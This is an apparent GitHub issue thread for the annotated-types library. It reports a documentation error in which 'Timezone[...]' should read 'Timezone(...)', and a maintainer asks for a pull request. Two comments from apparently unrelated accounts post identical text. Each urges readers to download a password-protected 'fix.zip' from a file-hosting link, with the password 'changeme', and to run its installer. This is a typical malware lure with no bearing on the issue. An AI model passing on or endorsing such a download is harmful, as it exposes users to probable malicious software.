### ISSUE TITLE
Documentation error

### ISSUE THREAD

**Issue by Sama-Darya** [annotated-types/annotated-types#79]
In your doc string and documentation for Timezone you instruct that:

"Timezone[...]`` (the ellipsis literal) expresses that the datetime must be tz-aware but any timezone is allowed."

This should be corrected to:

"Timezone(...)`` (the ellipsis literal) expresses that the datetime must be tz-aware but any timezone is allowed."

Replacing square brackets with normal brackets. This is used correctly in your test_cases here:

yield Case(
        Annotated[datetime, at.Timezone(...)], [datetime(2000, 1, 1, tzinfo=timezone.utc)], [datetime(2000, 1, 1)]
    )

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by adriangb** [comment]
Could you please submit a PR? Thanks
